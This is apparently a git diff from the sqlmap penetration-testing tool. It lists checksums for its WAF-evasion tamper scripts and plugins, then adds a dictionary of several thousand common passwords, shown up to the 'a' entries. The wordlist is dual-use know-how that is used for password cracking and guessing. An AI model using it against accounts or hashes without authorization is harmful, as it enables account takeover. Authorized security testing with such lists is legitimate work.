+da8cc80a09683c89e8168a27427efecda9f35abc4a23d4facd6ffa7a837015c4 plugins/generic/syntax.py +eb45fd711efa71ab9d91d815cc8abebc9abc4770311fbb827159008b000f4fc2 plugins/generic/takeover.py +45bfd00f09557e20115e6ce7fb52ff507930d705db215e535f991e5fbf7464de plugins/generic/users.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 plugins/__init__.py +423d9bfaddb3cf527d02ddda97e53c4853d664c51ef7be519e4f45b9e399bc30 README.md +c6ad39bfd1810413402dedfc275fc805fa13f85fc490e236c1e725bde4e5100b sqlmapapi.py +4e993cfe2889bf0f86ad0abafd9a6a25849580284ea279b2115e99707e14bb97 sqlmapapi.yaml +a40607ce164eb2d21865288d24b863edb1c734b56db857e130ac1aef961c80b9 sqlmap.conf +4cec2aae8d65d67cd6db60f00217aa05ab449345ed3a38e04697b85b53d755f1 sqlmap.py +eb37a88357522fd7ad00d90cdc5da6b57442b4fec49366aadb2944c4fbf8b804 tamper/0eunion.py +a9785a4c111d6fee2e6d26466ba5efb3b229c00520b26e8024b041553b53efba tamper/apostrophemask.py +cf26bc8006519bd25ce06d347f72770cd75b61575cf65e5812274e8ab9392eb4 tamper/apostrophenullencode.py +0b9ed12565bf000c9daa2317e915f2325ccabee1fa5ed5552c0787733fbccffe tamper/appendnullbyte.py +11ad15d66c43f32f5d0a39052e5f623a4752ad4fb275d642f2e4cd841ff82b41 tamper/base64encode.py +cb833979eccf26a5e176f7c8ca40a24bf9904cb2902a1b9df436aefb6a24447e tamper/between.py +6e72b92662185a56847cca235106bc354bd6a10e3e89a135b9ea8fa09cd8eb34 tamper/binary.py +9e1852d61d439181c42cb6d28656e9464a1dd5991269f000fb47e107f2f6f4f1 tamper/bluecoat.py +578e36fcf7d596574119ef75cbf1a83040913587a02855f0b6a7e684f9f9c8a5 tamper/chardoubleencode.py +c7892bff56b2b85dfdf9f24c783c569edac57a3fd5a254cf4554987a374206c9 tamper/charencode.py +72c163ff0b4f79bdec07fbea3e75a2eaa8304881d35287eab8f03c25d06e99e0 tamper/charunicodeencode.py +50107854594fb13b4b95eed2ab8e66d2dd5470dd7d6b59c124ca766b1ec4b6ed tamper/charunicodeescape.py +d0d8f2df2c29d81315a867ecb6baa9ca430e8f98d04f4df3879f2bcd697fac16 tamper/commalesslimit.py +1aee4e920b8ffa4a79b2ac9a42e2d7de13434970b3d1e0c6911c26bdd0c7b4e7 tamper/commalessmid.py +ff8d05da2c5a123a231671c97ee80bb77b6631d7e5356d836cfe15ef212b73e5 tamper/commentbeforeparentheses.py +66cad47087c78a5658445f8a00f2e1cd533a6d7c57aec2d1eb1fe486956aa3ea tamper/concat2concatws.py +b5a5ba94a78cf83b35cdb0b08d9d69dbf1f33c07cc5152c560ae5aee54a4c066 tamper/decentities.py +1d6bcc5ffe235840370cd9738b5e8067f8b24e8c0e2bb629d330a7e5c379328a tamper/dunion.py +99c59e6fd7cafc9238c53e037eff457823854eef7cb0c5ea05941e0223229209 tamper/equaltolike.py +b3940e8d029150a81f17a2da1141928c31b6abb9ade3672d093051e310439995 tamper/equaltorlike.py +d528e74ae7c9fc0cd45369046d835a8f1e6f9252eeef6d84d9978d7e329ab35f tamper/escapequotes.py +0694f202a4f57e0a5c4d5aa72eee121b6f344d4e03692d9e267e2212abed719c tamper/greatest.py +26e57bc7c118168f20a5fc80d2d2fdbef05c027328c5c55cbbe92047ee8123da tamper/halfversionedmorekeywords.py +f0a7b635061385a3bf399cc51faf4d5e10694266aaa21fba557ca655c00a09bc tamper/hex2char.py +9096cbf2283137d592408325347f46866fd139966c946f8ba1ea61826472d0bb tamper/hexentities.py +3e518ace6940d54e8844c83781756e85d5670c53dfac0a092c4ee36cd5111885 tamper/htmlencode.py +04028ea55034ef5c82167db35cb1276d3d5c717f6b22507b791342ccf82722ad tamper/if2case.py +365085e79d296791464ec3f041a26554b19ba4865c4a727e258e9586b0bcfbe7 tamper/ifnull2casewhenisnull.py +e73e3723d4b61515d7ad2c0fe6e9a9dcaeeac6a93ed6149f44d59e4e41543226 tamper/ifnull2ifisnull.py +94fe273bee7df27c9b4f1ee043779d06e4553169d9aec30c301d469275883dd1 tamper/informationschemacomment.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 tamper/__init__.py +017c91ba64c669382aa88ce627f925b00101a81c1a37a23dba09bfa2bfaf42ae tamper/least.py +d762543ef6d90fd6ce8b897fdfb864e0461d2941922d331d97a334aefdbbe291 tamper/lowercase.py +a890b9da3e103f70137811c73eeddfffa0dcd9fa95d1ff02c40fdc450f1d9beb tamper/luanginxmore.py +93d749469882d9a540397483ad394af161ced3d43b7cefd1fad282a961222d69 tamper/luanginx.py +d68eb164a7154d288ffea398e72229cfc3fc906d0337ca9322e28c243fbd5397 tamper/misunion.py +eafd7ad140281773f92c24dbc299bec318e1c0cced4409e044e94294e40ad030 tamper/modsecurityversioned.py +b533f576b260f485ebb70566c520979608d9f1790aa2811ce8194970b63e0d96 tamper/modsecurityzeroversioned.py +6a6b69def1a9143748fc03aa951486621944e9ee732287e1a39ce713b2b04436 tamper/multiplespaces.py +687f531696809452a37f631cdb201267b04cb83b34a847aec507aca04e2ec305 tamper/ord2ascii.py +07cca753862dc9a2379aea23823d71ad6f4f6716a220e01792467549f8bde95a tamper/overlongutf8more.py +b17748d63b763a7bfd2188f44145345507ce71e1b46f29d747132da5c56d7ed0 tamper/overlongutf8.py +dea9ab017cc4bde6f61f95a4f400ecba441525ff2d2dba886a2bf3ecdc1af605 tamper/percentage.py +5437bc272398173c997d7b156dac1606dcde30421923bfc8f744d3668441d79e tamper/plus2concat.py +3cec7391b8b586474455ef4b089a27c67406ba02f91698647bb113c291f38692 tamper/plus2fnconcat.py +007a21d189bfedd48d4ca2704fb7ea709ea72f4b206e38a7fe40446a12b0a6e3 tamper/randomcase.py +27dfb51abe8f97a833309c2a42c31a63c0eda4711d122639c5ea31e5b5a9021a tamper/randomcomments.py +e11f10ab09c2a7f44ca2a42b35f9db30d1d3715981bd830ea4e00968be51931b tamper/schemasplit.py +21fae428f0393ab287503cc99997fba33c9a001a19f6dd203bbcc420a62a4b90 tamper/scientific.py +7a71736657ca2b27a01f5f988a5c938d67a0f7e9558caba9041bd17b2cef9813 tamper/sleep2getlock.py +856de1573ba9b08f6f33e28ca5a96341697762afa163835dcd4772ba6e1dadc6 tamper/space2comment.py +715b56e60e8f7bf0a1198b356a32374797a8c2e1ba1f888794626205d63c63d5 tamper/space2dash.py +21c43aafe994e798335e6756fbed15f430629beb49042b56d47f232022044a65 tamper/space2hash.py +329fa6e9bb27e1770ccc1c42c3b3ddc8e57a970959d8482ff102d7bfee546a49 tamper/space2morecomment.py +c088e7061a1a4676bc7714f64005ac275fae349f3dc665f2d565f56ecae7619f tamper/space2morehash.py +f823e5afbd5ab8e3fb478d984528c7f675561cf2b4eb6634a5bc11756097a01f tamper/space2mssqlblank.py +0d3b1336a5ca15de0ce5617c153f91ff8715c34cf886a71cb8df5ae887df301d tamper/space2mssqlhash.py +528723c9cea1d91dac22cb44cab6f8f0174f98c3c547b42017589d9a19a314e1 tamper/space2mysqlblank.py +466bb10955155a042fe4ec3b3df6b98193fba1187a376179e0d4dbc068215d91 tamper/space2mysqldash.py +4ea418f8b226b0ab369f3a8e726b7df0bc4701a2d93585de70e13febe5f438b7 tamper/space2plus.py +b3b79bbcf48ba943af57978e32b928d567f28ed4e45651f15f9fe898e00c0331 tamper/space2randomblank.py +6769cbe7b42265ff257a49e17e894bc19ff805802e19f27d57c07a212de70a11 tamper/sp_password.py +8e52309b893770bce57215fd3bf42d53d7f0d164690b4121b598126cbaaf6bc3 tamper/substring2leftright.py +d4b29c9a47961430dd0a24c22f8fe2968374ca5b0611e8b2837481c8d77672bf tamper/symboliclogical.py +c442ec7bb6676bdc58447fa54c719a9322b1728ba96c2358081a73fa8a4612ff tamper/unionalltounion.py +9ebf67b9ce10b338edc3e804111abe56158fa0a69e53aacdd0ffa0e0b6af1f70 tamper/unmagicquotes.py +67a83f8b6e99e9bb3344ad6f403e1d784cf9d3f3b7e8e40053cf3181fabe47fa tamper/uppercase.py +3e54d7f98ca75181e6b16aa306d5a5f5f0dce857d5b3e6ce5a07d501f5d915aa tamper/varnish.py +7d469ee594390cbc10378f83af403bba249240eab00f0ad5a5fe0e3fa1fcbf0d tamper/versionedkeywords.py +dcb7a5584390f1604adff075c94139dd23711f2f516b68683ec4208dd0a00fda tamper/versionedmorekeywords.py +ce1b6bf8f296de27014d6f21aa8b3df9469d418740cd31c93d1f5e36d6c509cf tamper/xforwardedfor.py +55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py +f597b49ef445bfbfb8f98d1f1a08dcfe4810de5769c0abfab7cdce4eebbfcae7 thirdparty/beautifulsoup/beautifulsoup.py +7d62c59f787f987cbce0de5375f604da8de0ba01742842fb2b3d12fcb92fcb63 thirdparty/beautifulsoup/__init__.py +f862301288d2ba2f913860bb901cd5197e72c0461e3330164f90375f713b8199 thirdparty/bottle/bottle.py +9f56e761d79bfdb34304a012586cb04d16b435ef6130091a97702e559260a2f2 thirdparty/bottle/__init__.py +0ffccae46cb3a15b117acd0790b2738a5b45417d1b2822ceac57bdff10ef3bff thirdparty/chardet/big5freq.py +901c476dd7ad0693deef1ae56fe7bdf748a8b7ae20fde1922dddf6941eff8773 thirdparty/chardet/big5prober.py +df0a164bad8aac6a282b2ab3e334129e315b2696ba57b834d9d68089b4f0725f thirdparty/chardet/chardistribution.py +e9b0eef1822246e49c5f871af4881bd14ebd4c0d8f1975c37a3e82738ffd90ee thirdparty/chardet/charsetgroupprober.py +2929b0244ae3ca9ca3d1b459982e45e5e33b73c61080b6088d95e29ed64db2d8 thirdparty/chardet/charsetprober.py +558a7fe9ccb2922e6c1e05c34999d75b8ab5a1e94773772ef40c904d7eeeba0f thirdparty/chardet/codingstatemachine.py +3ca4f31e449bb5b1c3a92f4fcae8cc6d7ef8ab56bc98ca5e4130d5b10859311c thirdparty/chardet/compat.py +4d9e37e105fccf306c9d4bcbffcc26e004154d9d9992a10440bfe5370f5ff68c thirdparty/chardet/cp949prober.py +0229b075bf5ab357492996853541f63a158854155de9990927f58ae6c358f1c5 thirdparty/chardet/enums.py +924caa560d58c370c8380309d9b765c9081415086e1c05bc7541ac913a0d5927 thirdparty/chardet/escprober.py +46e5e580dbd32036ab9ddbe594d0a4e56641229742c50d2471df4402ec5487ce thirdparty/chardet/escsm.py +883f09769d084918e08e254dedfd1ef3119e409e46336a1e675740f276d2794c thirdparty/chardet/eucjpprober.py +fbb19d9af8167b3e3e78ee12b97a5aeed0620e2e6f45743c5af74503355a49fa thirdparty/chardet/euckrfreq.py +32a14c4d05f15b81dbcc8a59f652831c1dc637c48fe328877a74e67fc83f3f16 thirdparty/chardet/euckrprober.py +368d56c9db853a00795484d403b3cbc82e6825137347231b07168a235975e8c0 thirdparty/chardet/euctwfreq.py +d77a7a10fe3245ac6a9cfe221edc47389e91db3c47ab5fe6f214d18f3559f797 thirdparty/chardet/euctwprober.py +257f25b3078a2e69c2c2693c507110b0b824affacffe411bbe2bc2e2a3ceae57 thirdparty/chardet/gb2312freq.py +806bc85a2f568438c4fb14171ef348cab9cbbc46cc01883251267ae4751fca5c thirdparty/chardet/gb2312prober.py +737499f8aee1bf2cc663a251019c4983027fb144bd93459892f318d34601605a thirdparty/chardet/hebrewprober.py +62c3f9c1096c1c9d9ab85d516497f2a624ab080eff6d08919b7112fcd23bebe6 thirdparty/chardet/__init__.py +be9989bf606ed09f209cc5513c730579f4d1be8fe16b59abc8b8a0f0207080e8 thirdparty/chardet/jisfreq.py +3d894da915104fc2ccddc4f91661c63f48a2b1c1654d6103f763002ef06e9e0a thirdparty/chardet/jpcntx.py +d47a904bd3dbb678f5c508318ad24cbf0f17ea42abe4ea1c90d09959f110acf1 thirdparty/chardet/langbulgarianmodel.py +2ce0da8efb1eb47f3bc980c340a0360942d7507f3bb48db6ddd85f8e1f59c7d7 thirdparty/chardet/langcyrillicmodel.py +f18016edb53c6304896a9d2420949b3ccc35044ab31a35b3a9ca9fd168142800 thirdparty/chardet/langgreekmodel.py +2529ea984e44eb6b432d33d3bcba50b20e6038c3b83db75646f57b02f91cd070 thirdparty/chardet/langhebrewmodel.py +4616a96121b997465a3be555e056a7e6c5b4591190aa1c0133ad72c77cb1c8e0 thirdparty/chardet/langhungarianmodel.py +f25d35ef71aefd6e86f26c6640e4c417896cd98744ec5c567f74244b11065c94 thirdparty/chardet/langthaimodel.py +5b6d9e44d26ca88eae5807f05d22955969c27ab62aac8f1d6504e6fccd254459 thirdparty/chardet/langturkishmodel.py +4b6228391845937f451053a54855ad815c9b4623fa87b0652e574755c94d914f thirdparty/chardet/latin1prober.py +011f797851fdbeea927ef2d064df8be628de6b6e4d3810a85eac3cb393bdc4b4 thirdparty/chardet/mbcharsetprober.py +87a4d19e762ad8ec46d56743e493b2c5c755a67edd1b4abebc1f275abe666e1e thirdparty/chardet/mbcsgroupprober.py +498df6c15205dc7cdc8d8dc1684b29cbd99eb5b3522b120807444a3e7eed8e92 thirdparty/chardet/mbcssm.py +2c34a90a5743085958c149069300f6a05c4b94f5885974f4f5a907ff63e263be thirdparty/chardet/sbcharsetprober.py +d48a6b70207f935a9f9a7c460ba3016f110b94aa83dec716e92f1823075ec970 thirdparty/chardet/sbcsgroupprober.py +208b7e9598f4589a8ae2b9946732993f8189944f0a504b45615b98f7a7a4e4c4 thirdparty/chardet/sjisprober.py +a8bd35ef8952644e38d9e076d679e4b53f7f55c0327b4ee5685594794ae3b6d6 thirdparty/chardet/universaldetector.py +21d0fcbf7cd63ac07c38b8b23e2fb2fdfab08a9445c55f4d73578a04b4ae204c thirdparty/chardet/utf8prober.py +b29dc1d3c9ab0d707ea5fdcaf5fa89ff37831ce08b0bc46b9e04320c56a9ffb8 thirdparty/chardet/version.py +1c1ee8a91eb20f8038ace6611610673243d0f71e2b7566111698462182c7efdd thirdparty/clientform/clientform.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/clientform/__init__.py +162d2e9fe40ba919bebfba3f9ca88eab20bc3daa4124aec32d5feaf4b2ad4ced thirdparty/colorama/ansi.py +a7070aa13221d97e6d2df0f522b41f1876cd46cb1ddb16d44c1f304f7bab03a3 thirdparty/colorama/ansitowin32.py +d7b5750fa3a21295c761a00716543234aefd2aa8250966a6c06de38c50634659 thirdparty/colorama/initialise.py +f71072ad3be4f6ea642f934657922dd848dee3e93334bc1aff59463d6a57a0d5 thirdparty/colorama/__init__.py +fd2084a132bf180dad5359e16dac8a29a73ebfd267f7c9423c814e7853060874 thirdparty/colorama/win32.py +179e47739cdcb6d8f97713b4ecf2c84502ed9894d20cf941af5010a91b5275ea thirdparty/colorama/winterm.py +4f4b2df6de9c0a8582150c59de2eb665b75548e5a57843fb6d504671ee6e4df3 thirdparty/fcrypt/fcrypt.py +6a70ddcae455a3876a0f43b0850a19e2d9586d43f7b913dc1ffdf87e87d4bd3f thirdparty/fcrypt/__init__.py +dbd1639f97279c76b07c03950e7eb61ed531af542a1bdbe23e83cb2181584fd9 thirdparty/identywaf/data.json +e5c0b59577c30bb44c781d2f129580eaa003e46dcc4f307f08bc7f15e1555a2e thirdparty/identywaf/identYwaf.py +edf23e7105539d700a1ae1bc52436e57e019b345a7d0227e4d85b6353ef535fa thirdparty/identywaf/__init__.py +d846fdc47a11a58da9e463a948200f69265181f3dbc38148bfe4141fade10347 thirdparty/identywaf/LICENSE +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/__init__.py +879d96f2460bc6c79c0db46b5813080841c7403399292ce76fe1dc0a6ed353d8 thirdparty/keepalive/__init__.py +f517561115b0cfaa509d0d4216cd91c7de92c6a5a30f1688fdca22e4cd52b8f8 thirdparty/keepalive/keepalive.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/magic/__init__.py +4d89a52f809c28ce1dc17bb0c00c775475b8ce01c2165942877596a6180a2fd8 thirdparty/magic/magic.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/multipart/__init__.py +2574a2027b4a63214bad8bd71f28cac66b5748159bf16d63eb2a3e933985b0a5 thirdparty/multipart/multipartpost.py +ef70b88cc969a3e259868f163ad822832f846196e3f7d7eccb84958c80b7f696 thirdparty/odict/__init__.py +9a8186aeb9553407f475f59d1fab0346ceab692cf4a378c15acd411f271c8fdb thirdparty/odict/ordereddict.py +3739db672154ad4dfa05c9ac298b0440f3f1500c6a3697c2b8ac759479426b84 thirdparty/pydes/__init__.py +4c9d2c630064018575611179471191914299992d018efdc861a7109f3ec7de5e thirdparty/pydes/pyDes.py +c51c91f703d3d4b3696c923cb5fec213e05e75d9215393befac7f2fa6a3904df thirdparty/six/__init__.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/socks/__init__.py +7027e214e014eb78b7adcc1ceda5aca713a79fc4f6a0c52c9da5b3e707e6ffe9 thirdparty/socks/LICENSE +56ae8fb03a5cf34cc5babb59f8c2c3bb20388a04f94491f6847989428ce49b82 thirdparty/socks/socks.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/termcolor/__init__.py +b14474d467c70f5fe6cb8ed624f79d881c04fe6aeb7d406455da624fe8b3c0df thirdparty/termcolor/termcolor.py +4db695470f664b0d7cd5e6b9f3c94c8d811c4c550f37f17ed7bdab61bc3bdefc thirdparty/wininetpton/__init__.py +7d7ec81c788600d02d557c13f9781bb33f8a699c5a44c4df0a065348ad2ee502 thirdparty/wininetpton/win_inet_pton.py diff --git a/data/txt/smalldict.txt b/data/txt/smalldict.txt new file mode 100644 index 00000000000..96b0cab614a --- /dev/null +++ b/data/txt/smalldict.txt @@ -0,0 +1,10180 @@ + +! +* +***** +****** +******** +********** +************* +------ +: +????? +?????? +!@#$% +!@#$%^ +!@#$%^& +!@#$%^&* +$HEX +0 +0000 +00000 +000000 +0000000 +00000000 +000000000 +0000000000 +0000007 +000001 +000007 +00001111 +0007 +00112233 +0069 +007 +007007 +007bond +0101 +010101 +01010101 +01011980 +01012011 +010203 +01020304 +0123 +01230123 +012345 +0123456 +01234567 +0123456789 +020202 +030300 +030303 +0420 +050505 +06071992 +0660 +070707 +080808 +0815 +090909 +0911 +0987 +098765 +09876543 +0987654321 +0racl3 +!~!1 +1 +100 +1000 +100000 +1001 +100100 +1002 +100200 +1003 +1004 +1005 +1007 +1008 +1010 +101010 +10101010 +1011 +1012 +1013 +1014 +1015 +1016 +1017 +1018 +1020 +10203 +102030 +10203040 +1022 +1023 +1024 +1025 +1026 +1027 +1028 +1029 +102938 +1029384756 +1030 +10301030 +1031 +10311031 +1066 +10sne1 +1101 +110110 +1102 +1103 +1104 +111 +1111 +11111 +111111 +1111111 +11111111 +111111111 +1111111111 +111111a +11112222 +1112 +111222 +111222333 +111222tianya +1114 +1115 +1117 +1120 +1121 +1122 +112211 +11221122 +112233 +11223344 +1122334455 +1123 +112358 +11235813 +1123581321 +1124 +1125 +1129 +11921192 +11922960 +1200 +1201 +1204 +1205 +120676 +1207 +1208 +1209 +1210 +1211 +1212 +121212 +12121212 +1212312121 +1213 +12131213 +121313 +121314 +12131415 +1214 +12141214 +1215 +1216 +121834 +1220 +1221 +12211221 +1223 +1224 +1225 +1226 +1227 +1228 +123 +1230 +123000 +12301230 +123098 +1231 +12312 +123123 +12312312 +123123123 +1231234 +123123a +123123q +123123qwe +123123xxx +12321 +1232323q +123321 +123321123 +123321q +1234 +12341234 +1234321 +12344321 +12345 +123451 +1234512345 +123454321 +1234554321 +123456 +123456! +1234560 +1234561 +123456123 +123456123456 +123456654321 +1234567 +12345671 +12345678 +12345678@ +123456781 +123456788 +123456789 +1234567890 +12345678900 +12345678901 +1234567890q +1234567891 +12345678910 +1234567899 +123456789a +123456789abc +123456789asd +123456789q +123456789z +12345678a +12345678abc +12345678q +12345679 +1234567a +1234567Qq +123456987 +123456a +123456a@ +123456aa +123456abc +123456as +123456b +123456c +123456d +123456j +123456k +123456l +123456m +123456q +123456qq +123456qwe +123456qwerty +123456s +123456t +123456z +123456za +123457 +12345a +12345abc +12345abcd +12345q +12345qwert +12345qwerty +12345t +123465 +1234abcd +1234asdf +1234qwer +1235 +123654 +123654789 +12369874 +123698745 +123789 +123789456 +123987 +123a123a +123abc +123admin +123asd +123asdf +123go +123hfjdk147 +123mudar +123qazwsx +123qwe +123qwe123 +123qwe123qwe +123qweasd +123qweasdzxc +123qwerty +123spill +123stella +12413 +1245 +124578 +1269 +12axzas21a +12qw34er +12qwas +12qwaszx +1301 +1313 +131313 +13131313 +13141314 +1314520 +1314521 +1316 +13243546 +1332 +1342 +134679 +134679852 +135246 +1357 +13579 +135790 +135792468 +1357924680 +1369 +140136 +1412 +14121412 +1414 +141414 +14141414 +141421356 +142536 +142857 +1430 +143143 +14344 +1435254 +1453 +14531453 +1464688081 +147147 +147258 +14725836 +147258369 +1475 +147852 +147852369 +1478963 +14789632 +147896325 +1492 +1502 +1515 +151515 +159159 +159159159 +159357 +1596321 +159753 +15975321 +159753qq +159951 +1616 +161616 +168168 +1701 +1701d +170845 +1717 +171717 +17171717 +173173 +1776 +1812 +1818 +181818 +18436572 +1868 +187187 +1878200 +19031903 +19051905 +19071907 +19081908 +1911 +1919 +191919 +1928 +192837465 +1941 +1942 +1943 +1944 +1945 +1946 +1947 +1948 +1949 +1950 +1951 +1952 +1953 +1954 +1955 +1956 +1957 +1958 +1959 +1960 +1961 +1962 +1963 +1964 +19641964 +1965 +1966 +1967 +1968 +1969 +19691969 +196969 +1970 +19701970 +1971 +1972 +19721972 +1973 +19731973 +1974 +19741974 +1975 +19750407 +19751975 +1976 +19761976 +1977 +19771977 +1978 +19781978 +1979 +19791979 +1980 +19801980 +1981 +19811981 +1982 +19821982 +1983 +19831983 +1984 +19841984 +1985 +19851985 +1985329 +1986 +19861986 +1987 +19871987 +1988 +19881988 +1989 +19891989 +1990 +19901990 +1991 +19911991 +1992 +19921992 +1993 +19931993 +1994 +19941994 +1995 +199510 +19951995 +1996 +1997 +19971997 +1998 +19981998 +1999 +199999 +1a2b3c +1a2b3c4d +1g2w3e4r +1million +1p2o3i +1password +1q2w3e +1q2w3e4r +1q2w3e4r5 +1q2w3e4r5t +1q2w3e4r5t6y +1q2w3e4r5t6y7u +1qa2ws3ed +1qay2wsx +1qaz1qaz +1qaz2wsx +1qaz2wsx3edc +1qazxsw2 +1qw23e +1qwerty +1v7Upjw3nT +2000 +200000 +20002000 +2001 +20012001 +2002 +20022002 +2003 +20032003 +2004 +2005 +2010 +20102010 +2012comeer +201314 +2020 +202020 +20202020 +2112 +21122112 +2121 +212121 +21212121 +212224 +212224236 +22 +2200 +2211 +221225 +2222 +22222 +222222 +2222222 +22222222 +2222222222 +222333 +222777 +223344 +22446688 +2252 +2323 +232323 +23232323 +2345 +234567 +23456789 +23skidoo +2424 +242424 +24242424 +2468 +24680 +246810 +24681012 +24682468 +2469 +2501 +25011990 +25132513 +2514 +2516 +25162516 +25182518 +2520 +25202520 +2522 +25222522 +25232523 +25242524 +2525 +25251325 +252525 +25252525 +25262526 +25272527 +25292529 +25302530 +25362536 +256256 +256879 +2580 +25802580 +26011985 +2626 +262626 +2727 +272727 +2828 +282828 +2871 +2879 +290966 +292929 +2971 +29rsavoy +2bornot2b +2cute4u +2fast4u +2gAVOiz1 +2kids +2tjNZkM +3000gt +3006 +3010 +3030 +303030 +303677 +30624700 +3112 +311311 +3131 +313131 +313326339 +3141 +314159 +31415926 +315475 +3182 +31994 +321123 +321321 +321321321 +321654 +321654987 +32167 +3232 +323232 +3282 +332211 +333 +3333 +33333 +333333 +3333333 +33333333 +333666 +333888 +336699 +3434 +343434 +3533 +353535 +3571138 +362436 +3636 +363636 +36633663 +369 +369258147 +369369 +373737 +383838 +393939 +3bears +3rJs1la7qE +4040 +404040 +4055 +4121 +4128 +414141 +4200 +420000 +420247 +420420 +421uiopy258 +4242 +424242 +426hemi +4293 +4321 +43214321 +434343 +4417 +4444 +44444 +444444 +4444444 +44444444 +445566 +4545 +454545 +456 +456123 +456321 +456456 +456456456 +456654 +4567 +456789 +456852 +464646 +46494649 +46709394 +4711 +474747 +4788 +4815162342 +484848 +485112 +4854 +494949 +49ers +4ever +4tugboat +5000 +5050 +505050 +50cent +5121 +514007 +5150 +515000 +51505150 +515151 +5201314 +520520 +5211314 +521521 +5252 +525252 +5324 +5329 +535353 +5424 +54321 +543210 +5454 +545454 +5551212 +5555 +55555 +555555 +5555555 +55555555 +5555555555 +555666 +5656 +565656 +5678 +567890 +5683 +575757 +57chevy +585858 +589589 +5956272 +59635963 +5RGfSaLj +606060 +616161 +6262 +626262 +6301 +635241 +636363 +6435 +646464 +6535 +654321 +6543211 +655321 +656565 +6655321 +666 +6666 +66666 +666666 +6666666 +66666666 +666777 +666999 +676767 +6820055 +686868 +6969 +696969 +69696969 +6996 +6V21wbgad +7007 +709394 +7153 +717171 +727272 +737373 +74108520 +741852 +741852963 +747474 +753159 +753951 +7546 +757575 +7646 +7654321 +767676 +7734 +7758258 +7758521 +777 +7777 +77777 +777777 +7777777 +77777777 +7779311 +778899 +786786 +787878 +789123 +7894 +789456 +78945612 +789456123 +7894561230 +789654 +789654123 +789789 +789987 +7913 +7936 +797979 +7dwarfs +80486 +818181 +851216 +85208520 +852456 +8657 +8675309 +868686 +8757 +87654321 +878787 +8888 +88888 +888888 +8888888 +88888888 +8989 +898989 +8avLjNwf +90210 +909090 +90909090 +911 +911911 +9379992 +951753 +951753aa +959595 +963852 +963852741 +969696 +9768 +985985 +987456 +987456321 +9876 +98765 +987654 +9876543 +98765432 +987654321 +9876543210 +987987 +989898 +99887766 +9999 +99999 +999999 +9999999 +99999999 +999999999 +9999999999 +a +a102030 +a123123 +a12345 +a123456 +a1234567 +a12345678 +a123456789 +A123456a +a1a2a3 +a1b2c3 +a1b2c3d4 +a1s2d3f4 +a56789 +a838hfiD +aa +aa000000 +aa112233 +aa123123 +aa123456 +Aa1234567 +aa12345678 +Aa123456789 +aaa +aaa111 +aaa123 +aaaa +aaaa1111 +aaaaa +aaaaa1 +aaaaaa +aaaaaa1 +aaaaaaa +aaaaaaaa +aaaaaaaaaa +aabb1122 +aaliyah +aardvark +aaron +Ab123456 +abacab +abbott +abby +abc +abc123 +Abc@123 +abc1234 +Abc@1234 +abc12345 +abc123456 +abcabc +abcd +abcd123 +abcd1234 +Abcd@1234 +Abcd1234 +abcde +abcdef +abcdefg +abcdefg1 +abcdefg123 +abcdefgh +abcdefghi +abdullah +abercrombie +aberdeen +abgrtyu +abhishek +abigail +abm +abnormal +abraham +abrakadabra +absinthe +absolut +absolute +abstract +academia +academic +acapulco +access +access14 +accident +accord +ACCORD +account +account1 +accounting +accurate +ace +achilles +acoustic +acropolis +action +activity +acura +adam +adamadam +adamko +adams +addict +addicted +addiction +adelaida +adelante +adfexc +adgangskode +adi +adidas +aditya +adm +admin +Admin +admin000 +admin1 +Admin1 +admin12 +admin123 +Admin1234 +admin256 +adminadmin +adminadmin123 +administrator +ADMINISTRATOR +adminpass +adminpwd +adobe1 +adobe123 +adrenalin +adrenaline +adrian +adriana +adrianna +adrianne +adults +advance +advocate +aek1924 +aekara21 +aerobics +aerospace +affinity +afghanistan +africa +afterlife +again +agamemnon +aggies +agnieszka +agosto +aguilas +agustin +ahl +ahm +aikman +aikotoba +aileen +airborne +aircraft +airforce +airlines +airman +airplane +aisiteru +ak +akatsuki +aki123 +akira +akuankka +alabama +alabaster +alakazam +alan +alanis +alaska +alastair +albacore +albatros +albatross +albert +alberta +alberto +alberto1 +albion +alcapone +alcatraz +alchemist +alchemy +alejandr +alejandra +alejandro +alekos +aleksandr +aleksandra +aleksi +alenka +alessandra +alessandro +alessia +alessio +alex +alex2000 +alexa +alexande +alexander +alexander1 +alexandr +alexandra +alexandre +alexandria +alexandru +alexia +alexis +alexis1 +alf +alfaro +alfarome +alfred +alfredo +algebra +algernon +alias +alibaba +alicante +alice +alice1 +alicia +alisa +alisha +alison +alissa +alistair +alive +alkaline +all4one +alleycat +allgood +alli +alliance +alligator +allison +allison1 +allister +allmine +allright +allsop +allstar +allstars +allstate +almafa +almighty +almond +aloha +alone +alonso +aloysius +alpacino +alpha +Alpha +alpha1 +alpha123 +alphabet +alphonse +alpine +altamira +alterego +alternate +altima +altima1 +altitude +alucard +alvarado +always +alyssa +ama +amadeus +amanda +amanda1 +amaranth +amarillo +amateur +amazonas +ambassador +amber +amber1 +ambition +ambrosia +amelia +america +america1 +american +americana +amho +AMIAMI +amigas +amigos +amirul +amistad +amnesiac +amorcito +amoremio +amores +amormio +amorphous +amsterda +amsterdam +anabelle +anaconda +anakonda +anal +analog +analsex +analysis +anamaria +anarchy +anastasija +anathema +andersen +anderson +andre +andre123 +andrea +andrea1 +andreas +andreea +andrei +andreita +andrej +andrejka +andrejko +andres +andrew +andrew1 +andrew123 +andrey +andris +andromeda +andrzej +andy +andyandy +anette +anfield +angel +angel1 +angel123 +angela +angelas +angeles +angeleyes +angelfish +angelica +angelika +angelina +angeline +angelita +angelito +angelo +angels +angie +angie1 +angus +anhyeuem +animal +animals +Animals +animated +anime +aninha +anita +anitha +anjelik +ankara +annabelle +annalena +annalisa +annamaria +anne +anneli +annelise +annemarie +annette +annie +annika +anon +anonymous +another +antares +anteater +antelope +anthony +anthony1 +anthony2 +antichrist +antigone 